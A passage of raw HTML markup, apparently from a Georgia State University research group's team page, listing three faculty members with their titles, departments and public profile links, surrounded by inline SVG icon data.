1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c16-outer\">\n            <div data-colibri-id=\"182-c16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c16 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c17\" class=\"d-block style-980 style-local-182-c17 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/sunderraman1.jpeg\" class=\"wp-image-692 style-980-image style-local-182-c17-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-980-frameImage style-local-182-c17-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c18\" class=\"h-global-transition-all h-heading style-974 style-local-182-c18 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c18\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Raj Sunderraman</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c19\" class=\"h-text h-text-component style-975 style-local-182-c19 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Associate Chair and Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c20\" class=\"h-text h-text-component style-976 style-local-182-c20 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c21\" class=\"style-981 style-local-182-c21 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/raj-sunderraman-a5591bb2/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/raj-sunderraman/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?hl=en&amp;user=Wlxc9FEAAAAJ\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c22-outer\">\n            <div data-colibri-id=\"182-c22\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c22 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c23\" class=\"d-block style-982 style-local-182-c23 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-SRM-360x360-1-e1697143162762.png\" class=\"wp-image-1670 style-982-image style-local-182-c23-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-982-frameImage style-local-182-c23-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c24\" class=\"h-global-transition-all h-heading style-974 style-local-182-c24 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c24\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Susie Ramisetty-Mikler</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c25\" class=\"h-text h-text-component style-975 style-local-182-c25 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Research Associate Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c26\" class=\"h-text h-text-component style-976 style-local-182-c26 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Population Health Sciences\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c27\" class=\"style-983 style-local-182-c27 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/susie-ramisetty-mikler-7a0b3014/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://publichealth.gsu.edu/profile/susie-ramisetty-mikler/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=KzNVJwIAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c28-outer\">\n            <div data-colibri-id=\"182-c28\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c28 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c29\" class=\"d-block style-973 style-local-182-c29 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-zelikovsky-e1697143252884-1.jpeg\" class=\"wp-image-1673 style-973-image style-local-182-c29-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c29-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c30\" class=\"h-global-transition-all h-heading style-974 style-local-182-c30 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c30\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Alex Zelikovsky</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c31\" class=\"h-text h-text-component style-975 style-local-182-c31 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Distinguished University Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c32\" class=\"h-text h-text-component style-976 style-local-182-c32 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c33\" class=\"style-977 style-local-182-c33 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/alex-zelikovsky-48a2795/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 